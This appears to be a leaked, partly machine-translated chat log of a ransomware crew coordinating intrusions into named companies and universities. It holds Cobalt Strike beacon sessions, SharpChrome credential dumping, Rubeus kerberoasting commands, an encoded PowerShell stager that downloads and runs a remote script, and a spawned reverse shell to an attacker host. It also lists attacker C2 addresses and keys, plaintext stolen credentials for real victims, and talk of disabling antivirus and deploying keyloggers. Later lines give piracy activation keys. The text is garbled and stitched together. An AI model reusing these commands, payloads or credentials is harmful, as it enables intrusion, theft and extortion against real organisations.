joomlatest1 joomlatest2 kassabp
kassabp.adm macmainw macmainw.adm
Nagelr.adm scriptadm.app Troysec.adm
usanet.adm
``Yeah, take off sharpwebfirefox the process list and adne thick``
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpChrome.exe logins /showall



--- Chrome Credential (Path: C:\Users\forstern\AppData\Local\Google\Chrome\User Data\Default\Login Data) ---

file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\forstern\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://editor.vev.design/,https://editor.vev.design/login,9/2/2020 4:11:19 PM,13243551079155078,,Piper16!

``as soon as you check immediately + in the noteproverifybnpmedia.com I also check the rest? without confirmation only 3 users noteFRIVER.LOCAL there is one more appearedvip.pet write here the domain to which to create confona works and glorovnodavshego to salaku what to do in there should not work? works as a tip `` ``
shell net group "domain admins" /dom && net group "enterprise admins" /dom && net localgroup administrators
``Can you give us a session?`` Try dotnet brute force or smb login no no it didn't work.``The point of smb through smb_login?`` And what about brute force?
beacon> execute-assembly /home/omar/Desktop/Fast-Guide/Net-GPPPassword.exe
[*] Tasked beacon to run .NET program: Net-GPPPassword.exe
[+] host called home, sent: 114731 bytes
[+] received output:
Processing files in \GPJ.LOC\sysvol\GPJ.LOC\policies\
```

I can't get an error, but there's no result, nothing happens. elevate seems to work SharpUp says - yes, guys, the user is a local admin, you can bypass yuacni Net-GPPPassword and winpis won't show it to gpj and won't let it in. such pies what haven't tried before now guys try everything from gostpack they don't workvatson shows two vulnerabilitiesrubeus and kerberost doesn't accept domain specified both gpj and gpj.I've tried with Semen to run a brute force attack with sharpshrome, it blames on the domain. what's the problem now?[ ](https://mediaeveryone.com/channel/general?msg=9jNJDKiXxwpxapwMa) eto ne taketo so progress?
1) Domain Admins.
2) Enterprise Admins
3) Local Admins
4) Ad Info
execute-assembly /Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
``https://habr.com/ru/company/pt/blog/423903/выводит help does not work with parameter ``kerberoast````
execute-assembly /Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
```
Dumps all crb hashes, analog of script on ps`31d6cfe0d16ae931b73c59d7e0c089c0` is an empty string, remember! there are no users in AD with such a password, if you see such a ps, then the account is not workingsocreate to telnet,ssh,web,mssql,smb,rdp,vnc`ports 1-1024,3389,5900-6000`
why scan such a range? there are 900 empty ports and no mssql?
                           [02]: Fortinet SSL VPN Virtual Ethernet Adapter
                                 Connection Name: Ethernet 3
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.59.12.209
                                 [02]: fe80::89c3:6e80:ed9e:ca27

``````
The VPN seemed to be active
```
If his process just hangs there, it does not mean that it is active) ok. will appear - let's try the same as in the classic with cisco clients in generalvpn, I think, was active or LDAP tied there or through the RADIUS is authorizedWe kind of just discussed this point with Fortigate client, the point is that connecting through the Wpn via Fortigate client through the "domain" creeds occurs and connect the machine to the domainTo see the domainConnect through wpn@tl1 , while there is time, can you tell me how to be in the network matches? I can not see the DC there. Any thoughts on this? Good morning to all:metal:hi Good morning!Good morninggood nightgood nightgood nightdon't forget to ask and help each other and also go home so as long as there are no questions, 20 minutes + I'm talking about sticky notes or something like that tomorrow by 3 so you in the water check their desktop for notes on it2) if there are questions then ask1) take the archive with bills that the password will passthank you)Not before 12 home, I hope you close at least one network)Merry Christmas!Merry Christmas to all!!! Tomorrow by 3:30 workpozapozavlya forgot that yesterday was a holidayWe merry Christmas to all) pure koba!
23.106.223.123
https://tagdel.com
----------------------------------------------------------------------------------------
192.111.147.254:45008
RqwB6Sj9MH8NKzVrm9Xllv8uLBQWxZryhtM
``SIDH*G&8SDIGvS*DIF^*GSHIGUYRH``mailsniper works through the sameExchange administrator (i.e. member of "Exchange Organization Administrators" or "Organization Management" group)water path in the same network+- ExchangeOrganization Management in EAC the account with backup access should be in the group in other cases under the tops are directors, chief accountants, etc, If you can't back up everything, it could be that they just have their mail hosted, it's not that easy to download a backup, let me tell you about it.if it's not internal, it's external if there are no mail servers in the network, do we skip it?
in evo have not yet found and it seems that it is not tor the main thing do not forget because in the account is stored information about the sessions, and you can obviously get there through the web1 network 1 account can leave or every time a new registrar?the question you take backups that waymaybe someone else read this dialogue today in #water-way @user8 learned how to download fat files from the network a couple of things who do not know i wait in the groups info from additional tasks as well give out +1 cobu prozapasyasya you will give 2 builds, if you reach the stage of closing you close at your discretion on reports and results in the confusa tomorrow I will not be, work independently on #waterway-com and on #rtpcompany-com finalize + additional tasks + lf you remember about the additional tasks on the networks?a couple of announcements so everyone distract yourselves it's waterwaypo rdp hooked up to harper and reading slack#ballymoregroup-com#evo-com#waterway-com
#1-done-rtpcompany-com + so I understand we have four networks in operation?:space_invader:space_invader:helloGood evening,good eveningdepo did not come? where did @user7 disappear? unsubscribe[ ](https://mediaeveryone.com/channel/general?msg=HsR2bCoAz5ywv56vK) @tl1call dap plz, otherwise he again will not answer
a couple of shellcodes were sent to him to bypass simantecrelease give me a sign of life that I'm not writing to myselfnado urgently make #1-done-rtpcompany-com priority now104.....69 coba there are still alive
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
rtpco.local
``but it's old, you need to update all the access info in the confidenc inopnomdidic+user? and so? i don't see any new sessions in it, i don't see your cobuternicus.com
74.118.138.118demain kobaNo flylel or give me a psh stager i'll throw in my koba want dll@user3 load go) thank you`waterway.com` do the confab please`z3 will be on #wilsonart-com now i'll prepare the second grid to work, who will take over?[ ](https://mediaeveryone.com/channel/general?msg=oR3f2Th2ZEpq7J4DW) Yes you can of course still look for cna as an option)can be in the note of each color to assign a symbol :zany_face:as far as I know you can not)to be beautiful? =))))) i think not@tl1 @tl2 in the cob can somehow implement sorting sessions by color.i have no idea what to do with the other session, i can't find it in the configure, it's not a problem.hello there:space_invader:goodnight) until tomorrow) ehGoodnightnightnightnight tomorrow i.e. today goodnight don't forget that tomorrow by 5 tomorrow will be enoughTrust yourself from 5 to 10 if you have 10+ active sessions there slip for min 10 so you don't spam do not forget to clean up good night 150slip to monday for good health)) thank you very much)) tell @user3 not to be late on Mon by 10 am to start closing it yes, Let's make it 10:00 a.m. I guess.
they will have an hour at night. do you want it by 10 or on the morning of pnc 4-5 at night on pnc? tomorrow by 6 there is no point in going to work day in general such things on the desktop, a shortcut to disks how to find it? where? on the desktop? chanson mdb database where did you find it? yes we did? if you found access to the center until what time?
```
108.62.118.209
https://simvp.com
-
104.194.11.10:50058
ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX
``Taken.
23.106.160.86
https://raills.com
-
104.194.8.114:61660
bQerl9O7K5s9pKDlz2PF3SNxtEIoIN9AUAL3 out of 4 sorted out?+@user8 there you got 2 more sessions from that netchat - orenco.com.telecomlabsinc.com input coba, went sessions first took 2 did not take 3 took
173.234.155.75
https://likenic.com
-
104.243.40.126:38542
JI07HSLOl2MtjxWe0UhqpolvHLJPZCAcL6M
``````
204.16.247.229
https://instwp.com
-
199.127.60.227:52742
SP7PeWVtkJcPZlbXZOSlVpK4g61drpgJlUZ
``````
23.106.160.86
https://raills.com
-
104.194.8.114:61660
bQerl9O7K5s9pKDlz2PF3SNxtEIoIN9AUAL
``````
108.62.118.209
https://simvp.com
-
104.194.11.10:50058
ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX
``https pick up yourselves, 4 pieces ready, I'll give them here and you disassemble them yourself, just write down who picked up what on the new sootv pulling from the input above the grid in the work to finish on the old and another announcement, you koba update http://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon input coba```
199.127.60.67:20656
hPElm480XYW7rRX0fS7wSZU6owX4MJuSNey
``https://www.exploit-db.com/exploits/48537ну in general you should look for additional vector and additional task to find this case) in the rep lies only in the rep and the folder in the folder that he opens is the folder ëèççálvot here pay attention to the gif
https://github.com/danigargu/CVE-2020-0796
```:thinking:but i need to look and there is another option with rce)like on the ms17-010?
for goost need a session, no? and one more thing, about dead spots, did you do scans on the smbgost? and today put the buildda ok, let's do a story there and gather information on the offsets avera)
but i was there yesterday, i don't know how to check it but i don't know if it's critical, the scale is small and looking for ways to unscramble it) ok then solve the problem with EDR on all servers there are pinged +- 100-80252 machines without a server how many users?
0 Objects returned
are there any trusts? 20 pcs.... seriously?)file already if there is not enough buffer length let's make it clear at once that if it fits in the message - write in the message ``
DC:
	ITCMA-FILE03.ITC.LOCAL 10.10.0.22
	ITCMA-FILE02.ITC.LOCAL 10.0.0.38
	ASITC-DC01.ITC.LOCAL 192.168.0.221
	ITC-DC-SVR01.ITC.LOCAL 10.0.0.14

RDS:
	ITCMA-RDS01.ITC.LOCAL 10.0.0.8
	ITCMA-RDS-SVR01.ITC.LOCAL 10.0.0.6

Web Server:
	ITC-SHIP01.ITC.LOCAL 10.0.0.18
	ITC-APP01.ITC.LOCAL 10.0.0.17
	ITC-SQL01.ITC.LOCAL 10.0.0.16
	ITC-PLM01.ITC.LOCAL 10.0.0.23

Terminal:
	ITCMA-APP02.ITC.LOCAL 10.0.0.79
	ASITC-APP01.ITC.LOCAL 192.168.0.220
	ASITC-FILE01.ITC.LOCAL 192.168.0.227
	ITC-PLM02.ITC.LOCAL 192.168.0.224
	ITCMA-PDM01.ITC.LOCAL 10.0.0.165
	ITCMA-Print-SVR01.ITC.LOCAL 10.0.0.7

SQL:
	ITCMA-SQL02.ITC.LOCAL 10.0.0.81

Exchange:
	ITCMA-FILE01.ITC.LOCAL 10.0.0.39

Disabled:
	ITCMA-MITS01.ITC.LOCAL 100% loss
	ITCMA-PDM02.ITC.LOCAL 100% loss
How many servers are there in total? If there are not many you can try to shut down AV by hand, collect analytics on this and we will start with the number of servers. These are most likely the most critical of some @user3 found malware and bitdefender on itc-us.com servers had 4 servers? Or am I confused with another one?
Using GPO for Deployment

To install SecureAnywhere using GPO, you should have experience with Microsoft's Active Directory and the GPO editor.

You can also watch a video on how to use GPOs at How to Deploy Using Group Policy - SecureAnywhere Business.

To install SecureAnywhere using GPOs:

    From the following location, download the SecureAnywhere MSI installer to a network share:

    http://anywhere.webrootcloudav.com/zerol/wsasme.msi

    Downloading the file makes it accessible to all endpoints on which you will deploy SecureAnywhere.

    Go to the server that is the domain controller for the deployment group.
    Open the GPO editor on the domain controller and create a policy for the deployment group.
    Assign SecureAnywhere to all endpoints that belong to the Organizational Unit where the Group Policy is created.

    SecureAnywhere installs on the endpoints in the group when they restart.

``Two hours we work with these, then there will be new sessionsGood afternoonits-us.com - have
pkgprod.com - are what about the sessions?:flag_il:Good morning,good night to you allTomorrow by 3)Good, then we start at 3, the amount of work for tomorrow does not changeI only get out of bed at 14 I think that from now until tonight you have time to prepare the networks for the buildI do not understand is it convenient for you and you sleep before that time?can even earlierWhy at 14? Write to the group on the current networks status tomorrow we need to have two networks ready for the buildtomorrow by 14:00 still an hour working videli a shortcut on your desktop on the web, something to sol ...they seem to have such a system, but it also needs creeds)))) I'm not saying that it does not work at all do not save access to avs in browsers, but in password storage systems? keylogger koba* in sprouselaw from malware account keylogger and got it worked at all? keylogger koba itself is not the most working option in the working except for keylogger, it turns out?
they don't save the credentials from av in chrome anywhere
keylogger put today on a bunch of machines, as a result keystrokes - roam-away-field as an option - access only in working hours I've already gone through a shitload of machines (where admins sit), no access from anywhere, it seems there are backups going to the cloud if admin not found How to look for cmd version disable on servers, etc in other networks? no about that we did not find the av, admin
or do you mean something else? build ehekakoy build?) today's build have time to put?)) as a mantra do not forget the session in the slipway all have a good night, then tomorrow before 7 and go to rest then tomorrow we finish you hard) until the state looks like this
+ this is the domain where we are
TECHNISTONE.LOCAL - can't get through, no overlap of users and users/groups from other domains with rights
WI.RWP.COM is some kind of a dead domain, just wine 2003
```
WILSONART.COM +
CN.WILSONART.COM +
RALPHWILSON.COM +
ARBORITE.COM +
POLYREY.NET +
EU.WILSONART.COM +
UK.WILSONART.COM +
BUSHBOARD.CO.UK +
SLF.LOCAL +
RESOPAL.LAN +

TECHNISTONE.LOCAL no intersections
WI.RWP.COM 2003 mb old/inactive domain
	              

POLYREY.COM Quarantined
RESOPAL.GER Quarantined
```

found avs, backups, spheres and creeds to us region
left backups/spheres in europe
Symantec
 
    admin
    pRe1Udlp!


dcwas79.Wilsonart.com - vcenter
    
    fowlerh@wilsonart.com
    R3f1nn3j2!
``Give me a brief report on the work so wellWe are looking for creeds from the sphere and avv #wilsonart-com so far no way...
of the current credits no admin, no vulnerability on ms17/netapi, at least on the servers, GPPP does not give anything, orbs no quietly how are you doing? ok#alloypolymers-com preparing to close, divide themselves on both networks hello all, I will be late tonight and while I will not you work on #wilsonart-com and #alloypolymers-com, good night, tomorrow by 6 to what time?good night to all thank you all for tonight) and until the end of the week for sure #wilsonart-com and tomorrow according to the plans of @user3 network for the closing join me
fast, smoothly, clearlyThe first thing to say is that you did great, very good work give me 10 minkeAndruha we have a case, maybe close all the knights?com> go straight on to the next step it's strange that all the functions are affected I can not tell all the same try from another user to spawn from another car)[ ](https://mediaeveryone.com/channel/general?msg=CNPm6wjaL5G2ftqAE) it how respawn not helped work through remotno I would try to respawn try cmd substitute what rights you have?
beacon> spawn vew
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (hitark.com:443)
[+] host called home, sent: 840 bytes
[-] could not spawn C:\Windows\syswow64\wusa.exe: 740
Try to spawn a new session only one (on one server), nothing to move on all sessions? the same crap on execute-assembly, it doesn't matter what to run... I copied this piece from an attempt to run portcan[ ](https://mediaeveryone.com/channel/general?msg=ihcvpciBtarPTHnCD) this what for? why do you need this server?
```
[-] could not spawn C:\Windows\syswow64\wusa.exe: 740
[-] Could not connect to pipe: 2
``Check through rubeuswow on theoretically related servers ticketpngc - all the credentials are valid, but no one has rights. there are 21 cars on the network and it's servers. Inway is not catching anything yet. The impression is that they all work through RDP.  In addition, they seem to be all virtual machines (but not sure yet - I am checking) #pcsb-org
no access to neighboring domains
ports are scanned, morphs are checked for nas and other things @user7 and i are digging televisa.com.mx do you have anything to work with so far on your current tasks?will there be new networks today? it seems:man_raising_hand:is the internet working?)hi:space_invader:everyone helloTill tomorrow)thank you, see you tomorrow)don't forget to clean up after yourself,thank you all,good night)so,well,that's it. Today that's all, throw the session in the slip for 100 seconds +-, tomorrow we will continue) when trying to load a non-formed file writes an error (>4Gb) When you remove the ad info, remove the entire, all six files and download the same 6 files in Confra) Files over 50 meters are archived. Files over 200 mb in a compressed state are not downloaded through the cobaDon't forget to delete files created in the process of running commands! Today up to 12 daTo the second group alsoTry to work with her, maybe there faster copeIn the first group coba new session ``
[*] Tasked beacon to list processes
[+] host called home, sent: 12 bytes
[*] Process List with process highlighting
[*] Current Running PID: Yellow 892
[*] Explorer/Winlogon: BLUE
[*] Admin Tools: LIGHT BLUE
[*] Browsers: GREEN
[*] AV/EDR: RED
````.`[ ](https://mediaeveryone.com/channel/general?msg=3Dpt6nx8F2Yu9Km9o) .\[text\]\[text]\[qqq\]\[\url{https://katex.org/}\]sessions are gone༼ つ ◕_◕ ༽つ and what about the task?\{\a'\a'\underline{you yo piraka} doesn't work)\overgroup{Ingeborge Dapkunaite}{and how katya works\overgroup{Ingeborge Dapkunaite}?
 The mistakes of youth were easy to get away with.
Ah, youth, - the magic sound of a whistle.
We often sawed off the bough beneath us.
Now we are not the same, and the bitches have grown old.

``Thank you at the very bottom of the field``vfhrth`````

``````
right here)
`````'marker
123
007user1 - charmer, he has a message for me in a personal) + + in pm does not leave a message++All here? hahaI'm cheerfulGreat, who is not with us yet? Let them write in the slack works like everythinghttp://joxi.ru/D2PNv3QUJB5qNrI got a message, but to read it nowhereNo access to the PM we have the rights are cuthttp://joxi.ru/823GVzpTru/823GVzpT8a06L2+1 white screen with all white+also white screen can not? in slek otpisiteen not fit the passwords at 3hi not all can enter-no one came to personal messages? also white screenThere is nothing at all also no field to enter a message? I have a white background, no one personally with me does not open? user8[ ](https://mediaeveryone.com/channel/general?msg=2o2AnJQySQ6eGTJzD) on this, https://mediaeveryonecom/account/security - encryption E2E and reset the keyI can not write in person, please make me a human nickname Stalinnu me and the user is goodI do not understand what encryption password is required of me if you want uniqueness - Nickname in person)+++ I managed to open kmd but still can not pull in the cob, but managed to pull in ptsh, tomorrow will get all the information and will be untwisteddatax there's a flag -keep, when it gathersaablocks the session process kobydelka new not deleted whytomorrow by 3pick up, sessions in slipskoronu already 12takte guys you threw, no LA-parole not found the LA - admin and tsun-tsunetdo system does not risea, there vpn offu me in koba session what did not help?in tpsh did not fly? psh did not help? yes it's from here? a few pieces i threw out it ...? give me a screenshot of the lk without a VPN have anything to work with?
```
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx
```
ipn: Sage
i have no configs, i've tried everything manually, then i went through SauronEye, it's empty now i'll try it. i thought you were asking about arma or servda) fuck, you mean armitage ? only arma is available, i can't pull it there try to pull arma, win 10 now i'll try again in pts[ ](https://mediaeveryone.com/channel/general?msg=xAtkL5zvKkpzfAerN) and arma ?[ ](https://mediaeveryone.com/channel/general?msg=SpZYc5ZQE437xD8NP) that's my problem[ ](https://mediaeveryone.com/channel/general?msg=sFyr6iw2y3adPmDMa) this thing was on tasks@user7 you have what on tasks was before? still on the same - need to build dll then to mebug tpsh because of a socket chokeupuponovy stOoOw came as much as three times does not come into it either i read minds, or more details for the question what with ptsh?who needs to bild the shellcode to @user7@user7 was ready to volunteer not raised the sessionWhy? i need a volunteer can generate a new dll? i launch, the process hangs, but the session did not come dll? i can not draw in the coba and ptsh, kmd is closed but opened, does not let you run any exe file today till 12soglas, in the personal areaa did you order?) do not forget to make me an account in ptsh) check ipn and other stuff ``
beacon> shell net group "Domain Admins" /dom
[*] Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
这项请求将在域 WORKGROUP 的域控制器处理。

发生系统错误 1355。

指定的域不存在，或无法联系。

```
This request will be processed on the domain controller of the WORKGROUP domain.

There was a system error 1355.

The specified domain does not exist or cannot be contacted.
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes

``Domain is not responding there is a session in cobepop)`` on the external domain since they even have passwords repetition[ ](https://mediaeveryone.com/channel/general?msg=ShchebxkiSDtqpeN4) the internal one is the same?
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx

What domain did you have? Check if there is a pschhe I typoed or what? If it does not appear, then the socket server has failed and you will not have interactivethe bottom left of the window pops up sockets coopedd when logging in the pschhe who have not noticed the pricholbytnu thin or moderately delayed in 5 characters go or so it also dies?write with your hands and you don't copy it, it stops responding after trying to insert it try to run powershell.it doesn't respondkmda it doesn't write so in general tpsh domain pinged visible or dasgenerate a new onethispowershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0AWABjAGMAMwBSAFAAawBVAGMATwBEAHIAegBiAGQAagBJAFAAaQBIAHYAcABMAHcAYwBRAFUAcgBjAHkASQB6AHUAbABkAHcARQBFAGUAYQAnACkAKQA7AA==то write with your hands if you don't copypaste the loadpaste what are you trying to do?but the load doesn't paste something[ ](https://mediaeveryone.com/channel/general?msg=agTv5YDd7WNBgFCha) i clicked and it's been 5 minutes since then3 item super-duperper? below enter?[ ](https://mediaeveryone.com/channel/general?msg=pDJmChgpTzunrmnaK) something on elfiskom if it didn't paste mb not copied3 top after enter+win10?on my car the pcm doesn't work in kmd call the menu on your axis and see what item you have pasted then open cmd on your car I don't think (P) just find out what's in it. notepad.exe >> file >> open >> C:\system32 >> cmd.exe >> pcm >> gcnp right here write back as done@user7 help kmd what's erp, oa? I put everything that was run analogues?
peptide*))8ethan.yu
peptide1*leon
leon20180928no access to directories, too. Of available only mozilla and some little things like Word and Isis.
no shells:thumbsup:@user8
```
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx leon leon20180928
http://citrix.peptide.cn:81/citrix/xenapp/auth/login.aspx mason peptide*))8
http://citrixen.peptide.cn/citrix/xenapp/auth/login.aspx leon leon20180928
http://citrix.peptide.cn:81/citrix/xenapp/auth/login.aspx ethan.yu peptide1
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx dgs00318 peptide1*
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx ethan.yu peptide1*

in this case there is something to work with) already told@user3 will tell us there is a variant of loading the script in the memory of the ps itself in the tpc file run is always disabled in fact i will try in the tpc import yet in problems - command, output already said i tried to import ps1 script by rd and run it
writes disabled by the admin what does it mean to disable import and run if tpsh arrives? at least i tried to rdp in ps to do itkst, there is a neuter smblogin for ps anyway check hit then most likely already going back timer)no well it's possible, but i think i already made a noise)and when you start to make noise will not come?)polzak is dead, no his files[ ](https://mediaeveryone.com/channel/general?msg=kkoPu7T8eonmEBDok) 1) psh on the rpd, you hold a session polzak and if he flies in and sees the open psh and stuff will be unpleasant
2) tpsh can scan hosts by hash, check git@tl1 i can use that dll you gave me yesterday ?@tl1 Give me a clean cryptor
devry.edu
```
Coba and arma are not attracted (in all likelihood some iron blocker traffic)
Attracted tpsh, but what's the point of it if I have rdp psh
attracted msf, raised the system on a virtual machine
tried to scan network, session with a route or forwarding almost immediately dies
Same with brute force on LA - roth and portfwd kill the session
Broot on LA, each time resetting session, there is LA only on the same virutals useless
ms17 kills it right away.
I'm in the middle of a stalemate, thank you@user7
```
https://ucfapps.cloud.com/citrix/storeweb/ je517380@ucf.edu Sawgrass20@

``@user4
```
https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169!

``Create a group cpcc.eedtsu I'm not there I'm not there all have tasks? everyone hello good evening + + + l1nk@dildoso +LATTS = JordanLATTS@Jordan ?@all please - plus all pentesters here, create a separate channel + + + LATTSJordan = Joobs?I lost my team! Mine ran away (((SAVEllastikjoupson here like@allplease find JobsJobsrgivetHello everyone!)MMAN zdorovaten so all! TASPLhicastgallnixflay zdorovaten HicitrixporovozXENVbushTomfretersecrethewsiJackLincolnmilleniumroket kotorie bil, podvergcay natesky abyzi. welcome in new chat:)vsem privet! tentstompR1chdildosoJumpernu kuev, ta kuev, correct the mistake, royal pokemon) @grem is it chinese? sev korean aka I thought that's where Silver went !https://www.kinopoisk.ru/series/4742511/`
they're making a movie about us.
i was offered, i turned it down chinese trojan what's Trickbot ?
https://twitter.com/HoldSecurity/status/1492197523120955394
``baby``
https://xakep.ru/2022/02/21/conti-trickbot/
Who are these people? "Assholes - KCNS Slava all bots and Dimka ![ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=zSjkacQS2wD3JKevY) will still work) then the channel in the TH can bang I understand, but maybe) a joke Graeme, just kidding) there cloudflare collect information + is not very friendly with ToreKera here suggests switching to Diskord, go thereDimka! Demeter may know the answer to what month servers with chats paid for?:ping_pong:чпонгпингeyJhbGciOiJBHUVfjWcSx8H/Hnq6cUJDQNdcFXxXjRZoV6LXLJpb7XNIg16bD7ea1NyTC5gdWuZGD2ZHObA5q2EevHFCdw9K2/QiNPaRwlgihfO2WisGfo7BBLqOR4z5gnzFALwpPTnfyEBBuHcTrI8XMxLBfslxqH95zif0oEoOCM+WgVE3h4zHLYVGeBV8xRZxnmozgzsweyJhbGciOiJBdMYBYswmNG4LbAmrsZOXWGloABPeWeSOaXWHI/JrlxrG1vmS3eEZ6zPCOpUpFxf20sCp5psxAu8J/mYQGm2ygj3+hnb84tJ/yhbwUg785bDwUQxJmcx1pYMLXFpDJqJDSYNBc9okVk50fvVfkIER1bV4jyGPsLzdYNVGvmBNrX/WiJAUjxMQc3Vo9Hm4wLAXrF3mzXmf+tU3Y9fz9IRykGovHwZtockGhZUFe4L1Qp34JhNZjK7fEr0KT2AVYBuhQtJBf5vuE5vSrQFAauDmG2sr6gYPd/ilz7oJ4TDzLAjafSBDCnFOfa1mdKosPK/qJZkMm1zC93P0v7WcmEi4bbu9pLyPxRG1dORVvw2R5G4+BjBKaSewCd1+UelekUvwMxpTsojnQmG+CxxlRipczYMmvfZLxMqSrbdruX6S2tNKfV0pVIDEnkqv1a5Cjf3WdO7wIVs70D0F1Y2k1wu4RIHjntUwM2jQ9KCanaTSi/CW/gW/H9HDQ++waqCpTWv/BNDtEc+kzx2y47RpcUW8FBYJGMENKaFQJtKw7rTFJtsB/cLDOrqUqFmfjvGDY7gdOUc8iyjWKOQQgVb4TmHSDpNsEYheMY1iVw4hCTRi2F4JQBd1yE+0L1+InJZuS2nniJKww6jWNxhgyTnQW8SlRvamiySwQRylNOhGBNNvrelGsLaWaHzbjHHsz160oplr/pkJ155VVziR6id6SjcZq/drhk3Cg8MQWoNCv13LFbUhHBP5Q9kTOeyTvwFq6Semk1f5ACUOE2xiNjJPzRR5cw try it yourself )that's the way fuck all can@angelo, @nicholas , how do you interpret these changes correctly? I'm certainly an optimist myself, but not that much)) Bitos - 66We'll do it anyway! Gud right!!! People, do not panic. The Chinese are ahead of us in this sense, and nothing - they go through vpn.
And in general, any change for the better, if they are properly interpreted) Garfield certainly will, we are working ahead of the curve
In general, we are on the svyazi and are, by any means in ONmitzi, just to add a little light to your forecast. Probably somewhere in the national security strategy there is such a point and a task to act@stanton now look what you mean, yes, I agree, sorry, I got you, calm down, not what you say long domain names But they can probably cut the ISPs' hair for another reason.
they kamulitiruyut and can poluchit 1-10a50 bytes / sesno there rate certainly ochen low, you also need to tretenkat with the Chinese, chem there as they go globalPriletaet on site.coma32874128374871234.site.site.comIf ruben he knows, corrects and hints will be for everyone literacy, but he busy@stanton what? I see )as the answer and gets) 53 port is used to respond, packetsOk@manuel google, I do not remember right now, about 15 years ago was,
the internet through DNS queriesIn the subdomain you encode the informationHow do you do it in practice?it will be) *through dnsvo, this chat fell offwe got into dns queries when we needed the internet@homerada who cares, our solution should be:disappointed:and add to the protocol standard tcp/ip field with the sender's passport datawe have a task, they work it out, and we should feel comfortablevpn I also think soon in Russia will be killed,garfield is understandable, but colleagues are not very comfortable, need a new solutionNo way to find ... From Europe, my server, where I work, and where the connections to our rocket, all normal!
In Novosibirsk, for example, the server there is fucked up, no one can log in for half an hour or shitTor has been hit lately, especially in the RF, get ready guys Golden firewall is waiting for us, if you're in the RF of course)
 and here's such a dog dog coin.jpgA l_chat like? r_chat_normjaba that yes, cooing)Toad will quack that you're in place)Yes probably. And in order not to get a fine rOqueta must often vigil)))I in general, tor browser by itself, and the toad through a blow node on a separate PC in my network, if I have something falls off, so usually something oneNo, it was normal. It's from the nodes, it seems. I have not seen anything strange, seriously, vrozhe everything is okAll of them dropped out? Well, me yesterday was that until I change node, the connection in the rocket did not restoreGabka and qtox via tor work fine.tor may be stupid today norm, yesterday I could not leave unattended at all)I have been falling off, but I do not believe it)seems all normalAll the rocket failed periodically?In the end, beauty, downloaded the wind, the maximum key you specify through the gui, everything, it activated itself)), also normal solution ... If you have your dns-server, you can register a couple of parameters, then the wind themselves will find the server and activated.ourth, it's for vmIn general, the Km network work on the machine that activates, you can not put the server itself on, only on the dedicated to that purpose. It activates the entire line of Windows from 7 to 10 (mb 11), including the server. And office too....To convert retail office into volum is as follows:
```
retail to vl
dir ..\root\Licenses16\ProPlus2019VL*.xrm-ms
cscript ospp.vbs /inslic:"..\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ppd.xrm-ms"
cscript ospp.vbs /inslic:"..\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul-oob.xrm-ms"
cscript ospp.vbs /inslic:"...\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul.xrm-ms"
```
Next, prescribe the activation of kms-activation through the console.Utility will ask for a key, specify the kms key.
Office needed google, I do not remember the link to look for ProPlus 2019, somewhere there are links directly to the microsoft site, and there downloaded RetailDownload the wind: go to the site ms, there is MediaCreationTool, download it, it will download the wind, but by default it downloads Evalution, and we need Retail. We need to run the utility as follows:
```
\MediaCreationTool21H1.exe /Eula Accept /Retail /MediaArch x64 /MediaLangCode en-US /MediaEdition Professional

\MediaCreationTool21H1.exe /Eula Accept /Retail /MediaArch x86 /MediaLangCode en-US /MediaEdition Enterprise
```
(specify language and version).
https://ufile.io/48kbqx5x
p!yNONbgyft6Vfrd5cDes4#sea!ws6vde
```
This is the kms server and its source code. Inside the installation script, it simply commands manually in the console (only 3 commands, I do not know why the script does not work). Install the km server on any machine on the network.
Then from the other machines prescribe its ip, usually as follows
```
slmgr /ipk FJ82H-XT6CR-J8D7P-XQJJ2-GPDD4
slmgr /skms <IP>:1688
slmgr /ato
```
The key is the kms key for the system, the kms keys are publicly available on the ms site.
Activated usually volume edition, Evalution - not activated.
This kms can activate both winda and office.
Office is usually activated as follows:
```
cd c:\Program Files\Microsoft Office\Office15
cscript ospp.vbs /inpkey:<this is the office key
cscript ospp.vbs /sethst:192.168.1.10
cscript ospp.vbs /act
```
Office Kms-keys
```
2010
VYBB-TRJJPB-QFQRF-QFT4D-H3GVB

2013
YC7DK-G2NP3-2QQC3-J6H88-GVGXT

2016
7FN7W-JF8VP-VHJJK-4GKJQ-MDW3X

2019
NMMKJ-6RK4F-KMJVX-8D9MJ-6MWKP
``@elroy share again how to activate office and winnda, plzWorks, so left as is.It is done once, usually in those who do not work e2eThis is because it is tied to the password, hence this dance somewhere missed something.So.It is tied to the password as well.After each login I enter a code\the key to e2e2e for everyone would work.
But you need to dance with tambourine))
Dance like this:
```
After a series of manipulations algorithm is the following:
1) change the password and unlogged from all places.
